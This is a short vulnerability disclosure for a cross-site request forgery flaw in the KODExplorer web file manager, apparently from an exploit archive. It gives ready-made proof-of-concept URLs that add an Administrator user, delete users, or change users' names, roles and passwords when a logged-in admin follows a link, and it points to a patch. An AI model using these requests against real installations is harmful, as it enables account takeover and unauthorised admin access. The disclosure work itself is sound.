KODExplorer Web File Manager Cross Site Request Forgery
Posted on 31 December 2015
================================================================================ # KODExplorer web file manager - Cross Site Request Foreign ================================================================================ # Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/ # Date: 30-Dec-2015 # Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip # Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt ================================================================================ Description : there is no CSRF token protection on the user management area , an attacker can use the POC bellow to add , edit , remove any user by sending a link to logged in user with User Management privilege # PoC : Add user : http://localhost/index.php?member/add&name=[username]&password=[password]&role=Administrator Delete User: http://localhost/index.php?member/del&name=[username] Edit User: http://localhost/index.php?member/edit&name=[username]&name_to=[new_username]&role_to=[new_group]&password_to=[new_password] Patch released : Check my git https://github.com/benkhlifafahmi/KODExplorer ================================================================================ # Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN) ================================================================================ Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group
